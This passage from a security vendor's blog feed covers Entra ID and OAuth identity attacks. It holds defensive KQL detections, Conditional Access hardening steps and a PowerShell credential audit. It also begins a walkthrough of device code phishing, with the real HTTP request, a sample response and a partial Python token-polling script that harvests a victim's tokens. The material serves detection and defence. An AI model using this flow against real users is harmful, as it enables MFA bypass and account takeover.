plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" 
id=\"the-complete-detection-kill-chain\">The Complete Detection Kill Chain<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-complete-detection-kill-chain\" class=\"hash-link\" aria-label=\"Direct link to The Complete Detection Kill Chain\" title=\"Direct link to The Complete Detection Kill Chain\" translate=\"no\">​</a></h3>\n<p>For a SOC to catch this attack end-to-end, you need coverage across multiple log sources:</p>\n<!-- -->\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Master hunting query  chain of suspicious identity activity</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let suspicious_users =</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AADSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\" or</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            (NetworkLocationDetails == \"[]\" and RiskLevelDuringSignIn in (\"high\", \"medium\"))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | distinct UserPrincipalName;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(7d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where InitiatedBy.user.userPrincipalName in (suspicious_users)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Consent to application\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add service principal credentials\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add member to role\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add app role assignment to service principal\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Update application\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Set-InboxRule\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"New-InboxRule\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    User = InitiatedBy.user.userPrincipalName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Operation = OperationName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">    Target = TargetResources[0].displayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-cisos-should-do-this-quarter\">What CISOs Should Do This Quarter<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-cisos-should-do-this-quarter\" class=\"hash-link\" aria-label=\"Direct link to What CISOs Should Do This Quarter\" title=\"Direct link to What CISOs Should Do This Quarter\" translate=\"no\">​</a></h2>\n<p>The detection queries and attack chains above are interesting, but what matters is what you change. Here are the highest-ROI controls ranked by impact vs. effort:</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-1-block-device-code-flow-highest-impact-low-effort\">Priority 1: Block Device Code Flow (Highest Impact, Low Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-1-block-device-code-flow-highest-impact-low-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 1: Block Device Code Flow (Highest Impact, Low Effort)\" title=\"Direct link to Priority 1: Block Device Code Flow (Highest Impact, Low Effort)\" translate=\"no\">​</a></h3>\n<p>Create a Conditional Access policy that blocks the device code authentication flow for all users who don't legitimately need it (almost everyone in a standard enterprise).</p>\n<p><strong>Entra ID → Protection → Conditional Access → New Policy</strong></p>\n<ul>\n<li class=\"\">Users: All users (exclude break-glass accounts)</li>\n<li class=\"\">Cloud apps: All cloud apps</li>\n<li class=\"\">Conditions → Authentication 
flows → Device code flow: Yes</li>\n<li class=\"\">Grant: Block</li>\n</ul>\n<p>This single policy eliminates one of the most prevalent nation-state attack vectors.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-2-restrict-user-consent-high-impact-low-effort\">Priority 2: Restrict User Consent (High Impact, Low Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-2-restrict-user-consent-high-impact-low-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 2: Restrict User Consent (High Impact, Low Effort)\" title=\"Direct link to Priority 2: Restrict User Consent (High Impact, Low Effort)\" translate=\"no\">​</a></h3>\n<p><strong>Entra ID → Enterprise Applications → Consent and permissions → User consent settings</strong></p>\n<p>Set to: <em>\"Do not allow user consent\"</em> or at minimum <em>\"Allow user consent for apps from verified publishers for selected permissions only\"</em></p>\n<p>All third-party application consent should require admin approval. Yes, this creates IT tickets. Those tickets are preferable to a 90-day email forwarding rule the attacker is running silently.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-3-audit-service-principal-credentials-high-impact-medium-effort\">Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-3-audit-service-principal-credentials-high-impact-medium-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)\" title=\"Direct link to Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)\" translate=\"no\">​</a></h3>\n<p>Run the PowerShell enumeration from Section 4 against your tenant. 
You will find:</p>\n<ul>\n<li class=\"\">Applications with credentials that haven't been rotated in 2+ years</li>\n<li class=\"\">Credentials owned by employees who left the company</li>\n<li class=\"\">Applications with application permissions they don't need</li>\n<li class=\"\">Applications with Global Admin-equivalent permissions held by vendors</li>\n</ul>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Quick audit: service principals with credentials expiring far in future</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Application.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgApplication -All | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $app = $_</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $app.PasswordCredentials | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.EndDateTime -gt (Get-Date).AddYears(1) </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } | ForEach-Object {</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            App         = $app.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            AppId       = $app.AppId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            KeyName     = $_.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Expires     = $_.EndDateTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            CreatedBy   = $_.CustomKeyIdentifier  # often null for old creds</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Sort-Object Expires -Descending | Export-Csv \"long-lived-credentials.csv\"</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-4-enable-token-protection-conditional-access\">Priority 4: Enable Token Protection (Conditional Access)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-4-enable-token-protection-conditional-access\" class=\"hash-link\" aria-label=\"Direct link to Priority 4: Enable Token Protection (Conditional Access)\" title=\"Direct link to Priority 4: Enable Token Protection (Conditional Access)\" translate=\"no\">​</a></h3>\n<p>Entra ID's Token Protection feature (currently GA for service tokens, preview for sign-in tokens) binds tokens to the 
specific device they were issued on. Token replay from a different device fails, even with a valid refresh token.</p>\n<p><strong>Conditional Access → New Policy → Grant → Require token protection</strong></p>\n<p>This directly defeats AiTM phishing and token theft attacks.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-5-implement-privileged-identity-management-pim\">Priority 5: Implement Privileged Identity Management (PIM)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-5-implement-privileged-identity-management-pim\" class=\"hash-link\" aria-label=\"Direct link to Priority 5: Implement Privileged Identity Management (PIM)\" title=\"Direct link to Priority 5: Implement Privileged Identity Management (PIM)\" translate=\"no\">​</a></h3>\n<p>Permanent Global Administrator assignments are the attacker's dream. Every privileged role should be:</p>\n<ul>\n<li class=\"\">Time-bound: Activated for 1–8 hours maximum</li>\n<li class=\"\">Approval-required for highest roles</li>\n<li class=\"\">MFA-gated on every activation</li>\n<li class=\"\">Audited: All activations logged and alertable</li>\n</ul>\n<p>A compromised Global Admin credential that has never had PIM enabled means the attacker has persistent, unrestricted admin access. A PIM-enabled environment means an attacker with a stolen credential has nothing without completing an activation workflow.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"final-thought\">Final Thought<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#final-thought\" class=\"hash-link\" aria-label=\"Direct link to Final Thought\" title=\"Direct link to Final Thought\" translate=\"no\">​</a></h2>\n<p>The threat actors using these techniques (Midnight Blizzard, Scattered Spider, dozens of ransomware affiliates) are not sophisticated in the traditional sense. 
They are not writing novel exploits or reverse engineering kernels. They are exceptionally good at identity abuse and they are counting on the fact that your security controls were designed for a threat model from 2015.</p>\n<p>Fileless, identity-layer attacks beat EDR. They beat antivirus. They beat network monitoring. What they do not beat is:</p>\n<ul>\n<li class=\"\">Locked-down Conditional Access policies</li>\n<li class=\"\">Restricted consent settings</li>\n<li class=\"\">Actively monitored identity logs with purpose-built KQL detections</li>\n<li class=\"\">A SOC that understands what <code>AADNonInteractiveUserSignInLogs</code> means and checks it</li>\n</ul>\n<p>The signal is there. Attackers leave traces in every log source mentioned in this post. The question is whether your team is looking.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>: see how OAuth token theft fits into a full attack chain</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/mfa-bypass-device-code-phishing-token-replay-conditional-access\">MFA Bypass in 2025–2026: Device Code Phishing, Token Replay</a>: a deeper dive into device code phishing and PRT abuse</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>: ensure the identity events covered here are actually reaching your 
SIEM</li>\n</ul>\n<hr>\n<blockquote>\n<p>All commands and queries in this post are for defensive use: detection, auditing, and hardening. Test all detection queries in your environment against known-good baselines before using in production alerting.</p>\n</blockquote>",
            "url": "https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware",
            "title": "How Attackers Abuse Entra ID & OAuth Without Malware",
            "summary": "Exact techniques threat actors use to compromise Entra ID and OAuth without malware (token theft, device code phishing, consent abuse), plus KQL detections.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "entra-id",
                "oauth",
                "identity-security",
                "token-theft",
                "detection-engineering",
                "microsoft-365",
                "conditional-access"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access",
            "content_html": "<blockquote>\n<p><em>Your user just completed MFA. They entered their authenticator code correctly. Microsoft accepted it. Your Conditional Access policy evaluated and passed. And the attacker, sitting at a server in a different country, just received a valid OAuth access token with 60-90 minutes of life, a refresh token valid for 90 days, and a path to your entire Microsoft 365 environment. No phishing page. No fake login form. No credential harvested. MFA was the mechanism the attacker used to authenticate on the victim's behalf. This is not a future threat. It has been actively exploited since at least mid-2024, and campaigns surged dramatically in late 2025.</em></p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-mfa-is-no-longer-a-trust-boundary--its-an-authentication-step\">Why MFA Is No Longer a Trust Boundary: It's an Authentication Step<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#why-mfa-is-no-longer-a-trust-boundary--its-an-authentication-step\" class=\"hash-link\" aria-label=\"Direct link to Why MFA Is No Longer a Trust Boundary: It's an Authentication Step\" title=\"Direct link to Why MFA Is No Longer a Trust Boundary: It's an Authentication Step\" translate=\"no\">​</a></h2>\n<p>CISOs have treated MFA as a near-absolute control for years. The implicit assumption: if a user completed MFA, the session is legitimate. That assumption is now broken, not in edge cases, not theoretically, but in active, widespread campaigns documented by Microsoft, Proofpoint, Huntress, Wiz, and others throughout 2024–2025.</p>\n<p>The attacks covered in this post exploit a fundamental architectural truth about modern identity systems: <strong>authentication tokens are bearer artifacts</strong>. Once issued, they are trusted unconditionally by resource servers regardless of where they are presented. 
The attacker's goal has shifted from stealing credentials to stealing or intercepting tokens, and modern OAuth flows, designed for convenience and interoperability, hand attackers multiple legitimate mechanisms to accomplish this.</p>\n<p>This post covers three attack classes in technical depth:</p>\n<ol>\n<li class=\"\"><strong>OAuth Device Code Phishing</strong>: weaponizing a legitimate protocol flow to harvest tokens via social engineering, without ever hosting a phishing page</li>\n<li class=\"\"><strong>Token Replay / Session Hijacking</strong>: stealing issued tokens from browser storage, memory, or the macOS Keychain, then replaying them from attacker infrastructure</li>\n<li class=\"\"><strong>Primary Refresh Token (PRT) Abuse</strong>: the most powerful token in the Entra ID ecosystem, how it can be extracted or phished, and why it bypasses even phishing-resistant MFA claims</li>\n</ol>\n<p>For each: the exact attack flow, the commands and API calls involved, what Entra ID logs, what it misses, and specific KQL and detection logic you can deploy.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--oauth-device-code-phishing-mfa-bypass-by-design\">Part 1 - OAuth Device Code Phishing: MFA Bypass by Design<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-1--oauth-device-code-phishing-mfa-bypass-by-design\" class=\"hash-link\" aria-label=\"Direct link to Part 1 - OAuth Device Code Phishing: MFA Bypass by Design\" title=\"Direct link to Part 1 - OAuth Device Code Phishing: MFA Bypass by Design\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-understanding-the-legitimate-flow-rfc-8628\">1.1 Understanding the Legitimate Flow (RFC 8628)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#11-understanding-the-legitimate-flow-rfc-8628\" class=\"hash-link\" 
aria-label=\"Direct link to 1.1 Understanding the Legitimate Flow (RFC 8628)\" title=\"Direct link to 1.1 Understanding the Legitimate Flow (RFC 8628)\" translate=\"no\">​</a></h3>\n<p>The OAuth 2.0 Device Authorization Grant (RFC 8628) was designed for devices with limited input capability (smart TVs, printers, IoT devices) that cannot support an interactive browser login. The flow works as follows:</p>\n<ol>\n<li class=\"\">The device (the OAuth client) POSTs to the device authorization endpoint and receives a <code>device_code</code>, a short human-readable <code>user_code</code>, a <code>verification_uri</code>, and a polling <code>interval</code></li>\n<li class=\"\">The device displays the <code>user_code</code> and <code>verification_uri</code> to the user</li>\n<li class=\"\">The user opens the <code>verification_uri</code> in a browser on any other device, enters the <code>user_code</code>, and authenticates normally, including MFA and Conditional Access evaluation</li>\n<li class=\"\">Meanwhile the device polls the token endpoint with the <code>device_code</code> at the stated interval, receiving <code>authorization_pending</code> until the user finishes</li>\n<li class=\"\">Once the user has authorized, the next poll returns an access token (and, with <code>offline_access</code>, a refresh token) to whoever holds the <code>device_code</code></li>\n</ol>\n<p>The critical design property: <strong>the device polling for the token and the user completing authentication are decoupled</strong>. The device code is the only link between them. This decoupling is the attack primitive.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-the-attack-exact-http-flows\">1.2 The Attack: Exact HTTP Flows<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#12-the-attack-exact-http-flows\" class=\"hash-link\" aria-label=\"Direct link to 1.2 The Attack: Exact HTTP Flows\" title=\"Direct link to 1.2 The Attack: Exact HTTP Flows\" translate=\"no\">​</a></h3>\n<p>The attacker performs the following sequence. 
These are real API calls against Microsoft's identity platform:</p>\n<p><strong>Step 1: Attacker initiates the device code flow</strong></p>\n<div class=\"language-http codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-http codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">POST https://login.microsoftonline.com/common/oauth2/v2.0/devicecode HTTP/1.1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Content-Type: application/x-www-form-urlencoded</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&amp;scope=openid+profile+email+offline_access+https://graph.microsoft.com/.default</span><br></span></code></pre></div></div>\n<p><code>d3590ed6-52b3-4102-aeff-aad2292ab01c</code> is the client ID for <strong>Microsoft Office</strong>, a public client registered by Microsoft, requiring no secrets. 
Attackers use legitimate Microsoft client IDs to request broad scopes without needing to register a malicious application, making app-consent-based detection useless.</p>\n<p><strong>Response:</strong></p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"user_code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ABCD-EFGH\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"device_code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"BAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-....[long opaque string]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 
50%)\">\"verification_uri\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://microsoft.com/devicelogin\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"expires_in\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">900</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"interval\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"message\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code ABCD-EFGH to authenticate.\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p><strong>Step 2: Attacker begins polling while sending the phishing lure to the victim</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"BAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-....\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">while</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"urn:ietf:params:oauth:grant-type:device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" 
style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> device_code</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    resp </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> r</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" 